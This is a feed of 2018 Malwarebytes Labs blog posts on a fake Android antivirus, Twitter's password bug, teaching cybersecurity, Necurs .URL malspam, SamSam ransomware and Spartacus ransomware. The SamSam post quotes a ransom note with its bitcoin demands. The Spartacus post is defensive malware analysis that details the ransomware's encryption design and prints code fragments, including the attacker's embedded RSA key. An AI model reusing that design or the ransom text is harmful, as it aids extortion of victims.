Techie Feeds

Mobile Menace Monday: re-emergence of a fake Android AV

Malwarebytes - Mon, 05/07/2018 - 20:46

Back in early 2013, a new mobile antivirus (AV) company called Armor for Android emerged into the mobile security software industry that had everyone perplexed. It seemed eerily like malware known as a Fake AV, and some even gave it that label. As a younger mobile researcher, I was one of those who gave it such a label, adding it to a list of malware detections. Shortly after, Armor for Android contacted the security company I worked for at the time and demanded their detection be removed.

As a rebuttal, I wrote a blog to fire back with evidence that there was no way this AV company could be legitimate—despite it being on Google Play. I never published that blog because I was thrown off by something that had me questioning everything: the AV company was tested by a reputable antivirus testing company. Even more off-putting, it landed a high score to receive an official certification! How could a Fake AV be certified by a respectable AV test company?

I left the blog alone and let the subject die. But recently, Armor for Android appears to have made a comeback. Let’s take a look at how they were gaming the system five years ago, and what new tricks they’re up to now.

Cheating the system

Suddenly, Armor for Android was competing with everyone else in the industry after only a couple months. But how? Simple. They were cheating. I remember vividly that the naming conventions they used to detect malware were the same as other well-received anti-malware mobile scanners. To be fair, many in the industry use similar naming conventions. However, the ones used by Android for Armor were EXACTLY the same as other companies. It was obvious they were stealing other company’s detections. But how?

Share, but don’t steal

VirusTotal is a company that everyone in the software security industry uses to share detections with the world. You can simply upload a file, even an Android APK, to and several antivirus/anti-malware scanners will return results. This can aid the typical user in finding out if a file is malicious. In addition, it helps point security researchers in the right direction in determining for themselves if something is malicious. What isn’t allowed is stealing directly from VirusTotal to produce your results. Not only is this against the terms of service, it is a deadly sin among everyone in the security industry.

But that is exactly what Android for Armor does. By using a network analyzer tool and running Android for Armor, you can see traffic to and from VirusTotal. The detailed data reveals that they indeed steal the detections of others. Pretty easy to do well on a test when you’re peeking over the shoulder of the smartest kids in class!

Showing their real intentions

Android for Armor could have stopped there. They had already duped Google Play. In addition, they clearly had the money to pay for an expensive test to receive certification. Instead, they decided to proceed with tactics used by other Fake AV malware. The following evidence is what I found years ago, but regrettably never published.

Back in 2013, I was playing a free game downloaded from Google Play. In exchange for the app being free, I agreed to receive non-aggressive ads, as many of us do. What I saw was a series of different links using scare tactics:

Click to view slideshow.

As a young mobile researcher, I did what all of us would have done and clicked on these links to see down which rabbit holes it would me. The first hop was this one:

Onward down the rabbit hole, I clicked Download & Scan FREE Now, and it started to download a file named Scan-For-Viruses-Now.apk (more on this app in a bit).

After the download, I landed on a known Armor for Android web page that instructs you to allow unknown sources and again to download and install an app.

Very odd for a legitimate AV company to instruct mobile users to download directly from their website rather than pointing them to Google Play.

Double chance of infection

Further analyzing the downloaded app, Scan-For-Viruses-Now.apk, it’s a version of Armor for Android that insists on a payment of $1.99 to scan the device. Check the fine print, because that ends up being $1.99 per week, or $103.48 a year. But hey, they have a certification by an AV testing form, right?

Click to view slideshow.

It appears Scan-For-Viruses-Now.apk downloads just in case you weren’t falling for the last web page asking to allow unknown sources and stating IMPORTANT! You must now INSTALL, OPEN and ACTIVATE. Also, if allowing unknown sources was disabled on your device, it would have been a last chance effort, since Scan-For-Viruses-Now.apk wouldn’t have been able to download and install. In my opinion, none of this looks like the practices of a legitimate AV company.

Re-emergence of a classic

Just a couple of days ago, an APK came into our mobile intelligence system with a different name, but very familiar set of behaviors. It was clearly a repackaged variant of Armor for Android, but this time called Android’s Antivirus.

Click to view slideshow.

Swiftly, we added a detection called PUP.Riskware.Armor.

Warning about Fake AVs

Fake AVs like the one described above have been around for a long time and come in many different forms. Some can be extremely dangerous. For legitimate antivirus/anti-malware programs to do their jobs, special permissions must be given. For instance, Malwarebytes for Android uses device administration as required to remediate nasty ransomware. As a respectable anti-malware company, you have our word that we will never use device administration rights for erasing mobile devices or other nefarious actions.  However, give those same rights to a malicious Fake AV app, and you could be in trouble.

Fake AV or legitimate

Because of the elevated permissions needed, consumers need to take extra caution when choosing a mobile antivirus/anti-malware scanner. Unfortunately, it’s often hard to tell what is a Fake AV versus a legitimate antivirus/anti-malware mobile app—especially when Fake AVs creep into Google Play and take time to create a convincing website. As a consumer, do your research to pick respectable software companies. Does the company have a deep, respectable blog (like this one)?  How long have they been around? When in doubt, you can always rely on Malwarebytes products to keep you safe from the latest threats!

Denial of entry

Although I never published that blog way back when, I did stand my ground to classify Armor for Android as a fake AV. Now, as a researcher at Malwarebytes, I continue to fight against shady fake AV companies in the mobile space. I helped detect Armor for Android as a fake Android AV years ago. I’ll do the same for any other company looking to take advantage of mobile customers. Stay safe out there!

The post Mobile Menace Monday: re-emergence of a fake Android AV appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Week in security (April 30 – May 6)

Malwarebytes - Mon, 05/07/2018 - 17:18

Last week on Labs, we examined the Spartacus ransomware, reported about a new tactic used by the Necurs malspam campaign, informed you about the recommended Twitter password change, and discussed engaging students to start considering careers in cybersecurity.

Other news
  • NTML credentials can be stolen via malicious Portable Document Format (PDF) files without any user interaction. (Source: SecurityWeek)
  • Twitter sold data access to a Cambridge Analytica-linked researcher. (Source: Bloomberg)
  • FacexWorm targets cryptocurrency users by spreading through Facebook Messenger. (Source: Security Affairs)
  • New DNS encryption tools accelerate privacy online. (Source: HelpNetSecurity)
  • IoT security: Is cryptocurrency-mining malware your next big headache? (Source: ZDNet)
  • Companies from across the tech spectrum are lining up to protest the measure that would allow them to “hack back” with offensive initiatives in the face of a cyberattack. (Source: ThreatPost)
  • Drive-by Rowhammer attack uses GPU to compromise Android phone. (Source: ArsTechnica)
  • The systems that control water and power plants are shockingly vulnerable to hackers. (Source: Gizmodo)
  • Facebook’s dating service is a chance to meet the catfisher, advertiser, or scammer of your dreams. (Source: Washington Post)
  • Roskomnadzor, Russia’s telecommunications watchdog, blocks 50 VPNs and Proxy Services providing access to Telegram. (Source: BleepingComputer)
  • Cat burglar: Kitty cryptominer targets web application servers, then spreads to app users. (Source: SCMagazine)

Stay safe, everyone!

The post Week in security (April 30 – May 6) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Twitter security snafu: change your passwords

Malwarebytes - Fri, 05/04/2018 - 19:18

If you’re logging into Twitter after having been AWOL for a day or two, you’ll likely be seeing one of these pop-ups talking about account security:

Click to enlarge

Don’t panic, it’s nothing that can’t be fixed.

The message reads as follows:

Keeping your account secure

When you set a password for your Twitter account, we use technology that masks it so no one at the company can see it. We recently identified a bug that stored passwords unmasked in an internal log. We have fixed the bug, and our investigation shows no indication of breach or misuse by anyone. Out of an abundance of caution, we ask that you consider changing your password on all services where you’ve used this password

This text is taken from a post on the official Twitter blog, where they explain what happened (admittedly, without a great deal of additional information), and what you should do to ward off account compromise.

One slight issue I have with the notification wording is that they “ask” users to “consider” changing passwords. It feels like they should have been a lot more forceful here, or just automatically scrubbed all existing logins, making everyone update their passwords by default. Regardless of messaging, the moment a password is exposed—no matter what capacity, internally or externally—you owe it to yourself to go change it before things become problematic.

A big issue with passwords being exposed in this kind of scenario would be a lack of two-factor authentication combined with password reuse. Not everyone makes use of 2FA, and that equals a potential threat where people reuse the same login across multiple, unrelated accounts. Thankfully, Twitter has addressed this, giving users the necessary information to do something about it.

From the blog:

  1. Change your password on Twitter and on any other service where you may have used the same password.

  2. Use a strong password that you don’t reuse on other websites.

  3. Enable login verification, also known as two factor authentication. This is the single best action you can take to increase your account security.

  4. Use a password manager to make sure you’re using strong, unique passwords everywhere.

Interestingly, it appears GitHub recently ran into a similar issue with internally exposed passwords (though it doesn’t seem to be on the same scale as Twitter’s snafu):

Hi @briankrebs I got a similar email from GitHub. I don’t know whether this too large scale as that of Twitter.

— deegovee (@deegovee) May 4, 2018

As some Twitter users have suggested, it’s possible someone at Twitter read about the GitHub incident, checked their own logs, and then said “Oh no” a lot. However this all came about, and keeping in mind how information available to social network employees can potentially be abused, we should be mindful that despite our best efforts as a user of a service, ultimately something can go wrong that’s entirely out of our hands. In the Twitter and GitHub cases, we strongly advise keeping passwords unique and making use of 2FA to avoid losing control of important accounts.

If you want to know more about password managers, why you might want to use them, and what ones are out there, you should check out our blog on that very subject. Just keep in mind that sometimes incidents do happen, and that password managers can also be good targets for scammers. Weigh up the pros and cons, and make the decision best suited for you personally.

If you’d like to find out about two factor authentication, then our piece on 2FA basics will likely be just what you need. We even have some advice for what to do if you need to go on holiday and 2FA by SMS codes won’t be available.

Finally, if you spend a lot of time on mobile Twitter, then you may wish to think about securing your mobile device, too. All the fancy passwords in the world alongside a slice of 2FA won’t help much if someone retrieves your lost phone from a ditch and starts spamming an inventive collection of swear words and pornography links to your colleagues.

To summarize, then; login as soon as possible, change your password (and enable 2FA), take a look at your security settings, examine your third-party applications, and keep on Tweeting. Your social media vertical increasing can go about its business. Hooray!

The post Twitter security snafu: change your passwords appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Engaging students in cybersecurity: a primer for educators

Malwarebytes - Fri, 05/04/2018 - 16:52

Give a man a fish and you feed him for a day;
teach a man to fish and you feed him for a lifetime.
~ Maimonides

The education sector has had its share of breaches. And schools, like medical and retail institutions, continue to struggle when it comes to securing their highly-priced assets: student and staff data and intellectual property. This is a big challenge for many. Unfortunately, it’s not the only challenge they face.

The education sector is pressured to address skills shortage, not just within the cybersecurity industry but in their own as well. Educators are also faced with the challenge of teaching the current and future generation of students about cybersecurity and privacy, fields which for most of them are relatively new and challenging to learn. Furthermore, engaging students to start considering careers in cybersecurity—much less getting them interested and talking about it—is another hurdle to conquer.

Educators are left wondering, “How can I even begin to tackle all this?” Before we start concerning ourselves with what to do with students, here are two questions teachers must ask themselves first:

How prepared am I for this?

Remember that a mark of good teaching is the knowledge, firm grasp, and familiarity with the subject matter. Teachers both new and experienced who are willing to take up teaching cybersecurity can start off by learning more about this subject for themselves, understanding why it’s crucial that every citizen of every country must play their part, and how they can make a difference in the burgeoning fight against cybercrime. There are some ways this can be done:

  • Get trained. The National Initiative for Cybersecurity Careers and Studies (NICCS), an online resource and training hub managed by the Department of Homeland security, offers cybersecurity training for educators for free. They can check out the materials from the NICCS official website.
  • Seek mentors among experienced cybersecurity educators and/or professionals. It’s always good to have someone show you the ropes on something you’re not that familiar with yet. Same is true for educators, and there’s no shame in asking to be mentored. After all, educators can benefit from the best and brightest minds in this field, as do the students.
  • Teach yourself via the Internet. Self-learning is always an option, and there are free and available materials an educator can use for studying online. Cybersecurity Ventures also has a hefty list of private institutions that educators and their organizations can invite to do in-house training. Lastly, the National Initiative for Cybersecurity Education (NICE), which is a program of the National Institute of Standards and Technology in the Department of Commerce, has more materials teachers can pore over.
What methods can I use to introduce this new subject to my students?

Making cybersecurity palatable to K–12 students is something educators must prepare and plan ahead for. For some organizations, the availability of technology has made it easier for teachers to use methods beyond the blackboard and textbooks.

This doesn’t mean that old yet effective methods of instruction are entirely forgotten. Instead, integrating technology must be used alongside tools that already work in a classroom. Technology also livens up the class, making it conducive for students to accept the new subject matter. TeachHub recommends that teachers undergo the four stages of technology integration, which are substitution, augmentation, modification, and redefinition, should they decide to take advantage of new learning tools using technology. And when it comes to training students on cybersecurity, it’s a must.

We can’t give what we don’t have. In this case, educators cannot impart knowledge about cybersecurity without (or are in the process of) gaining sufficient learning about it themselves. So it’s essential to undergo this step before moving on to the next.

Ways to get students interested and involved in cybersecurity

The majority of educators love teaching because they also like working with young kids. And starting them young is the ideal stage to discuss cybersecurity. How young? Some say once they begin elementary school; for others, there is really no defined age. As long as the kids (1) are mature enough mentally to be taught about the importance of safe computing, and (2) are already using technology, such as a smartphone or tablet, then we can say they are ready to take this new step to learning.

Like any list, the outline below isn’t exhaustive. This is also, by no means, not an ordered list of steps but rather a list of guidelines you can follow (and reject) at your discretion. As educators, you can branch out and look for other ways. Keep honing your methods and replacing them with new, more efficient ones. So without further ado, below are methods we’re proposing for kids:

1. Join boot camps. Independent and private organizations can conduct cybersecurity camps for kids and teens. It’s up to the educator to learn more about such programs, getting as much information as they can, and then choosing which camp they’d vouch for their students to join. Examples of camps are GenCyber, Cyber Camps by the US Cyber Challenge, and Tech Camps by ID Tech.

2. Join competitions. This is probably applicable from middle- to university-level contests that can be in-school or out-of-school. Examples are Carnegie Mellon’s picoCTF, CyberFirst Girls Competition (in the UK), CyberPatriot, and Global Cyberlympics.

3. Go on tours. Some schools can organize trips within government and private sector offices that deal with cybersecurity.

4. Get an internship. Students at the high school level (as young as) can apply for an internship to companies that have openings for information security teams. An internship is the closest hands-on experience they can gain in a real-world setting. Educators can encourage their students to go for this, or go that extra mile and vouch for the students to companies they want to intern.

5. Volunteer to teach younger generations about cybersecurity. This may apply to high school and university-level students who would be graduating. Not only would this help educators immensely by being unburdened from some of the tasks of teaching, but it can also be a positive experience for students while putting themselves in the shoes of being a mentor. Who knows—they might actually take an interest in teaching cybersecurity for the next generation.

And as for teachers, they can help students by doing the following:

1. Provide them a role model. Kids and teens need someone they can look up to or model after, even when they don’t realize it at first—This could explain why YouTube stars are so famous. If you want to encourage kids and teens to be an expert in the field of their interest in the future, educators must introduce to them personalities they can emulate. Are the little girls in class a fan of Taylor Swift? Mention that Swifty is actually besties with Karlie Kloss, international supermodel and coder.

2. Develop their soft skills. While tech and coding skills may be necessary for several job positions, soft skills—especially when sharpened to the point of awesomeness—can not only get the post-grad through the door but can also keep them employed for a long time.

In a previous blog post, we asserted that if one wants to work in cybersecurity, they don’t have to be too technical or know how to code. In fact, some are saying that the skills shortage being experienced in this industry is not about lacking technical people. Instead, the industry requires technical people who also have other skills like advanced reading, advanced writing, communication, management, organization, critical thinking, and troubleshooting skills. Most employers actually consider soft skills as more important than hard skills.

Read: When cybersecurity isn’t all cyber: What does it really take to work in cybersecurity?

3. Recognize talents that they can use in cybersecurity. Some students may feel put off or inadequate in pursuing careers that they deem too technical. Musical individuals and those with above-average eye-hand coordination (e.g., video game players), they say, may have a high opportunity of success in the cybersecurity field. They are creative personalities who can think outside the box when it comes to solving problems and innovation, especially when they are adequately trained. Educators can utilize the studies behind these claims to pique student interest for a start.

4. Provide a platform for students to learn, share, and apply what they learned. At this day and age, it may not be difficult to find a platform. We have already mentioned YouTube above. There is also GitHub for the code monkeys, and, if your child is into messaging instead of social networking sites to get in touch with their friends, there is Discord, where they can create a room and throw ideas around to members who can help refine them. There is also Twitch, where some game modders actually broadcast themselves coding and testing the code of the game they want to improve on.

5. Gamify learning. Gamification, or the use of game mechanics and design, to drive home important points that may otherwise leave students confused can bring about high engagement. Not to mention, it’s extremely fun. There are some ways educators can apply this. They can change the class grading system from letter grades to “experience points” (or XP in the gaming world) as one teacher already demonstrated, awarding students with tangible incentives like badges, conduct tournaments among small groups within the class, and using actual games that teach about cybersecurity, privacy, and hacking. For middle- to high-school educators, assess if you can introduce your students to games like TIS-100, Shenzhen I/O, and Uplink. Zachtronics have more and various games to offer on their website.

6. Teach them the necessary security skills. One cannot be equipped to work in cybersecurity—or, in this day and age, in any industry—until they know basic cybersecurity hygiene. This is fundamental, but it shouldn’t stop there. Students will learn and adapt better security techniques to protecting their own and company assets once they advance in their education and begin working. But having some sort of security cornerstone or foundation must be there to build on.

7. Ingrain in them the importance of continuous development. Education shouldn’t begin and end in institutions. This may seem like a no-brainer, but it is important to remind students that although learning on the job is essential, it is equally important to make an effort to understand concepts they haven’t encountered in the classroom by reading books and researching about them online. Life these days is fast-paced, and if one is not paying attention, valuable knowledge can just pass us by.

8. Expand cybersecurity education and training efforts to include all students. This may be applicable only in a university setting. Expanding cybersecurity education means that it shouldn’t be only students in STEM courses being trained on it. The curriculum should include practical applications of security in their career of choice and how insecure practices may potentially jeopardize not just their employment but also the clients they serve. Real-world scenarios and examples are the best case studies.

The cool factor

While educators expose students to the exciting and highly positive aspects of cybersecurity, it’s unavoidable for them to also see the other side of it: the exploits, methodologies, and (if the information is available) the people behind cybercrimes and threat actor groups that the cybersecurity industry is battling against.

Thanks to increased media coverage on successful breaches, availability of written works and videos on various hacktivist ideologies, and the dramatization of the misuse of computer and network prowess in television series and movies, students have more to internalize and mentally process today compared to previous generations. Unfortunately in today’s culture, more and more are not taking the time to think things through before acting. In many instances, kids and teens like to do things because of “the cool factor” involved.

This isn’t entirely a bad thing. The dramatization of hacking in TV and movies, no matter how poorly they were presented, has inadvertently put cybersecurity on the media map, undoubtedly sparking viewers’ imaginations, helping form idealisms and dreams, and pushing intellectuals and creatives alike to pursue the “what ifs.”

So if you hear students expressing sympathy over Elliot Alderson’s plight in taking down an evil corporation that he works for, a liking to Penelope Garcia’s focus and quick wit in the midst of life-or-death situations, or a deep fascination for Harold Finch’s selflessness and fierce loyalty to the cause of saving and not taking lives, let them. But also bring them gently back down to reality and introduce eye-opening documentaries of real-life hackers and how the cyberculture came about.

CyberRisk named a few titles in a recent blog post, from Hackers in Wonderland (2000) to Hackers are People, Too (2008). Of course, we’d like to add The Triumph of the Nerds: The Rise of Accidental Empires (1996), Downloaded (2013), The Internet’s Own Boy: The Story of Aaron Swartz (2014), Deep Web (2015), and Softwaring Hard (2014).

Heck, if these aren’t cool for them, then I don’t know what is.

The post Engaging students in cybersecurity: a primer for educators appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Internet Shortcut used in Necurs malspam campaign

Malwarebytes - Thu, 05/03/2018 - 17:44

The Necurs botnet continues to be one of the most prolific malicious spam distributors, with regular waves of carefully-crafted attachments that are used to download malware.

The majority of malspam campaigns that we track are targeting Microsoft Office with documents containing either macros or exploits. We also see a number of other types of malicious attachments that are zipped scripts (.VBS, .JS, etc)—essentially downloaders for the final payload.

In a new technique recently uncovered, Necurs is changing things up a little bit by avoiding the aforementioned formats and using a different file type instead, crafting malicious .URL files (Internet Shortcut).

This attack relies on the file:// protocol to load and execute a remote script from a samba (SMB) share. This is noteworthy because typically the attachment is used as a downloader, but instead here we see one additional step that pushes this function one degree further thanks to the .url shortcut.

By not placing the malicious script directly within the attachment, attackers are also preventing the automated collection and sandbox analysis that usually takes place within spam traps.

An obfuscated view of the WSF script can be seen in the screenshot below:

The final payload is eventually downloaded from a remote server:

This is an interesting attack designed to bypass traditional security measures and administrative policies that may block the well-known Office macros.

Malwarebytes users are already protected against this technique.

Malware authors are constantly looking for new evasion techniques as long as they generate good success rates. Social engineering attacks have relied upon the same lures for some time, but every now and again we see a slight variation in a technique that was perhaps known, but not yet leveraged by criminals.

The post Internet Shortcut used in Necurs malspam campaign appeared first on Malwarebytes Labs.

Categories: Techie Feeds

SamSam ransomware: what you need to know

Malwarebytes - Tue, 05/01/2018 - 15:54

SamSam ransomware is a custom infection used in targeted attacks, often deployed using a wide range of exploits or brute-force tactics. Based on our own run-ins with the infection, we’ve observed that attacks were made on targets via vulnerable JBoss host servers during a previous wave of SamSam attacks in 2016 and 2017.

In 2018, SamSam uses either vulnerabilities in remote desktop protocols (RDP), Java-based web servers, or file transfer protocol (FTP) servers to gain access to the victims’ network or brute force against weak passwords to obtain an initial foothold. From there, the ransomware “fun and games” begin for the authors. For everyone else, it’s chaos.

The ties that bind

A common thread tying all of these attacks together is the use of the word “sorry” in ransom notes, URLs, and even infected files. It’s made hundreds of thousands of dollars so far, and it’s caused no end of trouble in the US for cities like Atlanta.

Here’s what a typical ransom splash screen looks like:

The ransom note is quite interesting, giving the option of randomly-selected file encryption (if you don’t pay the full amount). They’ll also unlock one file for free as a token of trust that they will give your files back after payment. It reads as follows:

What happened to your files?

All your files encrypted with RSA-2048 encryption, for more information search in Google “RSA encryption”

How to recover files?

RSA is a asymmetric cryptographic algorithm, you need one key for encryption and one key for decryption so you need private key to recover your files. It’s not possible to recover your files without private key.

How to get private key?

You can get your private key in 3 easy steps:
1) You must send us 0.8 Bitcoin for each affected PC or 4.5 Bitcoins to receive all private keys for all affected PCs.
2) After you send us 0.8 Bitcoin, leave a comment on our site with this detail: just write your host name in your comment
3) We will reply to your comment with a decryption software, you should run it on your affected PC and all encrypted files will be recovered

With buying the first key you will find that we are honest

Ransomware authors rely on the victim viewing their odd code of “honesty” as important, or else nobody would dare to pay up.

I should also mention, before we go any further, that we do protect against this specific threat, which we detect as Ransom.Samas:

The SamSam group have been making waves since late 2015, causing trouble in 2016, and starting to regularly increase the cost of their ransom in 2017. Colorado and Atlanta have both had run-ins with SamSam recently, as you may have seen from ongoing news coverage.

One would think SamSam has been around long enough for organizations to be able to deal with it effectively, but it’s still here, and still locking up machines in targeted attacks.

You can trace SamSam’s first2018 appearance in back to January. There’s “persistent” and then there’s SamSam.

January: Sorry, not sorry

Hospitals, city municipalities, and many more from Indiana to New Mexico were all struck down by SamSam in varying degrees of severity. A hospital in Indiana, in particular, was reduced to working with pen and paper in stormy weather. They decided to pay the ransom and get systems back up and running, given the cost of the fix was more than the ransom. This is an organization that had backups in place, unlike many other ransomware victims. All the same, by attacking a service offering life-saving treatment to patients, staff were left with few options.

Though you’ll find conflicting advice on paying the ransom, and while appreciating that every case is different, we generally advise not to do it. By handing over the cash, you’re giving the green light to the hackers to carry on doing it. If it works the first time, why not the second or third?

This is the already fraught situation healthcare professionals and departments responsible for day-to-day management of city services find themselves in as we head into February.

February: Slow traffic blues

In February, the Colorado Department of Transportation had to shut down 2,000 (non critical) systems as they, too, were hit by a SamSam outbreak. Bitcoin was once again what the hackers were after; the CDT decided that they weren’t going to pay up, but restore their backups instead.

March: Atlanta ransomware resurgent

All of the worst problems of SamSam effectively rolled into one large pile of misery for the city of Atlanta, who had a serious case of the SamSam blues:

The City of Atlanta is currently experiencing outages on various customer facing applications, including some that customers may use to pay bills or access court-related information. We will post any updates as we receive them.

— City of Atlanta, GA (@Cityofatlanta) March 22, 2018

They were faced with the prospect of paying $6,800 per machine to unlock the encrypted files, or a cool $51,000 to recover everything across all compromised computers. As to how the attackers got in, one researcher noted a potential EternalBlue route:

C’mon @Cityofatlanta… SMBv1 open on web.atlantaga[.]gov to the internet? Have we learned nothing!?#ransomware #Atlanta

— Reggie (@Ring0x0) March 23, 2018

Regardless of the method used, the big problem here is that 10 days after initial infection, they were still struggling to get back to full strength, with no less than five out of 13 departments hit in the original malware blast. Just like the Indiana hospital staff were forced to use pen and paper, so too were law enforcement in Atlanta—and they also lost some police records in the bargain.

Note that three city council staffers had to work on a “clunky personal laptop.” So now we’re introducing personal machines onto a network dealing with potentially sensitive data, already hammered by opportunistic malware infections. One hopes that the machine had at least been checked for infections or potential vulnerabilities, but it would be surprising if the already busy IT staff checked if the employee had installed all security patches.

You could say the ransom was “only” $51,000—except the ransomware authors pulled the payment page and left Atlanta carrying the can. Ultimately, the SamSam outbreak cost the city of Atlanta a terrifying $2.6 million dollars to set a $50k infection right.

It isn’t just fixing some computers. There’s everything from forensics and insurance to extra staff and crisis comms to consider. This is the very real cost of attempting to recover from an infection—and that’s while trying to offer public-facing services potentially impacted by the attack.

Fighting ransomware

Ransomware may be experiencing a drop in popularity but make no mistake—the impact can be horrendous. As a reminder, here are some ways local governments and other organizations can fend off these attacks:

  • Backups are essential, and help to reduce some of the impact from a ransomware attack. A word of caution: your backups have to be logical and easy to implement if needed. All too often, organizations throw everything into a jumble of files and folders, with duplication galore and no real instructions as to where everything should go.
  • Staff training. It’s arguable that the automated systems in place should stop attacks long before reaching the human component of your network, but giving staff a crash course in security basics is always a good idea.
  • Spam filtering for email-based attacks (fake PDF invoices, booby-trapped Word documents insisting you enable Macros and the like).
  • Disable unnecessary exposed services facing the Internet, a time-honored way in for ransomware infections everywhere.
  • Change default/easy-to-guess passwords on all of your systems and services (not just the “important” ones, because ultimately someone will find their way in on the supposedly unimportant ones instead).
  • Choose your vendors wisely.
SamSam: not gone, and not forgotten

Money makes the world go round, and for SamSam their currency of choice is Bitcoin. Make no mistake, business is good; they’re estimated to have racked up around $850,000 in profit and they show no sign of slowing down. Consider that their estimated $850k profit is still nowhere near the cost of recovery for the City of Atlanta alone, and then take into account how much cleanup has cost for everyone else affected so far.

No matter your reason for being online, and regardless of which industry you operate in, I think we can all agree warding off an attack such as the ones above should be foremost in your mind when allocating a budget to security threats. SamSam isn’t going away anytime soon, and unfortunately the same can be said for other infections waiting to strike. It only takes one moment of inattentiveness, and you could be faced with some difficult decisions indeed.

Thanks to Marcelo for screenshots and additional information.

The post SamSam ransomware: what you need to know appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Spartacus ransomware: introduction to a strain of unsophisticated malware

Malwarebytes - Mon, 04/30/2018 - 17:40

Spartacus ransomware is a new sample that has been circulating in 2018. Written in C#, the original sample is obfuscated, which we will go over as we extract it to its readable state.

Spartacus is a relatively straight-forward ransomware sample and uses some similar techniques and code to others we have seen in the past, such as ShiOne, Blackheart, and Satyr. However, there is no sure relationship between these samples and the actors. I mention it mainly to show that they share similar functionality and are basic in form.

In the case of Satyr and Blackheart, the code is nearly identical, with Spartacus following almost the same code flow with some modifications. If I were to make an assumption, I would say they are either the same actor or the actors for each of them used the same code. But again, there are no facts to prove this as of now.

In general, what we notice is that there is a string of these .NET ransomware popping up, all of them more or less the same or similar. It is just an easy form of ransomware that criminals are creating, as it obviously does not take much time or thought to make.

There is nothing impressive about them, in fact just the opposite. I would say they are boring at best. So why are we writing about one of them? The analysis of Spartacus can essentially be used as a base knowledge and reference for anyone analyzing variants of these basic .NET ransomware that they may come across in the future.

The two take aways from this article will be understanding the code in detail, and understanding how to get an obfuscated .NET sample into a readable state.


Before we begin, I want to mention one characteristic about Spartacus’ encryption method. Spartacus starts by generating a unique key for encryption done with the Rijndael algorithm. (The Rijndael algorithm is a version of AES.)

This key is saved and used to encrypt every single file, meaning that two identical files will have the same cipher-text. The AES key is encrypted with a RSA key embedded in the file. The cipher-text is encoded and shown to the user in the ransom note.

The fact that the RSA key is statically embedded in the ransomware implies that the private key exists on the server side of the ransomware author’s system. Thus, all AES keys from all victims of this particular strain can be decrypted using this one key if it is ever leaked.

As this ransomware is not extremely complex, we will go straight to the deep technical analysis and code walkthrough.


When we first open the sample of Spartacus in ILSpy, we see this:

The code of the functions is not visible and as you can see, everything is obfuscated. In these scenarios, I like to use a tool called de4dot. It will process the file and output a clean readable version. The -r flag is where you set the directory, which contains the obfuscated .NET sample.

This gives us the clean version, which we will be using for our analysis going forward.


Let’s begin with the Main function shown below.

It starts by making sure there is only one instance of this malware running on the system. It does so by the CheckRunProgram function, which, among other things, creates a mutex and makes sure it is unique.

After this check is complete, it executes smethod_3 in a thread.

Before the smethod_3 begins, the constructor for this class gets automatically called now and sets up all the private members (variables), which include all special folders to search and encrypt. It also generates the AES key, which is unique to the victim, using the KeyGenerator.GetUniqueKey(133) function. The special folders can be viewed below and will be referenced throughout the ransomware to begin folder traversing.

The keygen function as I mentioned is GetUniqueKey(), the details of which are below. Essentially, it just creates a series of cryptographically strong random numbers using the RNGCryptoServiceProvider.GetNonZeroBytes API function. It then uses that series of random numbers as indexes to the character set
array = “abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890” to build a unique string of characters. This is the AES key, which will encrypt all files going forward.

Now that the constructor of the class has been initiated, let’s take a look at the smethod_3 function that was called.

This function iterates the list of special folders, which was generated in the constructor and begins its recursive traversal encrypting every file in the folders using the smethod_6 function. One thing I will note here is that the encryption loop does not discriminate file types or special files. It will encrypt everything it comes across. Also, you can see smethod_1 being called. This may be a leftover mistake of the programmer, as its output is not used anywhere in the program and is called later on when it’s time to display the encrypted key to the user.

As I mentioned, the smethod_6 function is the one doing all the encryption, but the smethod_5 function is the recursive function that will dig into each sub folder of whatever location it starts at, calling smethod_6 on each iteration to encrypt the files in that sub folder.

As you can see, it calls itself so that it will eventually cover every single sub folder. Then it calls smethod_6 to do the actual encryption, looping through every file in that folder.

This method iterates all files in the current folder. The only stipulation is that the file is not already encrypted. This is the portion here, which simply makes sure the extension is not already .Spartacus:

if (Path.GetExtension(text) == ".Spartacus") { return; }

If this check passes, it calls smethod_7, which does the file content rewriting with the encrypted version.

The function calls smethod_0, which encrypts the original file data, and then the next two lines write the encrypted data into the file and rename it with the .Spartacus extension. A quick note: Another sign that every single file is encrypted with the same key is that this ransomware does not write the encrypted AES key into the file, which we see in other ransomware that perform unique file encryptions.

As you can see here, it uses the Rijndael method—AES using ECB mode. The key that was generated in the constructor is hashed with MD5, and that is actually what is used as the key itself.

Now we have gone through the whole process for file encryption on the main file system, through all the sub functions called inside of the parent function smethod_3.

Let’s go back to the main function now to the next line, which calls smethod_4():

smethod_4 basically performs exactly the same set of recursive function calls as we saw in smethod_3, however, rather than looping through special folders, it is now iterating over all logical drives that are attached to the system. So all external or mapped drives will be encrypted as well.

We do not need to go through all these details now as we have already covered their functionality, being that they are identical to the earlier function calls. The only thing I will mention is that smethod_6 is called twice. This is done most likely to speed up the encryption by having it run on two threads.

Back to main: the next and final important function call is:

Application.Run(new Form1());

This will display the ransom note to the user and show the encrypted AES key in the ransom note.

It starts by calling smethod_1(). As I mentioned above, this simply takes the AES key, which was generated at the beginning and encrypts it using the hard-coded public RSA key.

public static string smethod_1() { return Convert.ToBase64String(Class1.smethod_2("<RSAKeyValue><Modulus>xA4fTMirLDPi4rnQUX1GNvHC41PZUR/fDIbHnNBtpY0w2Qc4H2HPaBsKepU33RPXN5EnwGqQ5lhFaNnLGnwYjo7w6OCkU+q0dRev14ndx44k1QACTEz4JmP9VGSia6SwHPbD2TdGJsqSulPkK7YHPGlvLKk4IYF59fUfhSPiWleURYiD50Ll2YxkGxwqEYVSrkrr7DMnNRId502NbxrLWlAVk/XE2KLvi0g9B1q2Uu/PVrUgcxX+4wu9815Ia8dSgYBmftxky427OUoeCC4jFQWjEJlUNE8rvQZO5kllCvPDREvHd42nXIBlULvZ8aiv4b7NabWH1zcd2buYHHyGLQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>", Encoding.UTF8.GetBytes(Class2.smethod_0()))); }

The RSA key is hard coded and embedded into the ransomware, which means that the author has generated the private key in advance on his side.

It then iterates all drives and writes the ransom note there. Finally, it opens the ransom note displaying the message and the RSA-encrypted AES key, which will be used by the victim in order to decrypt.

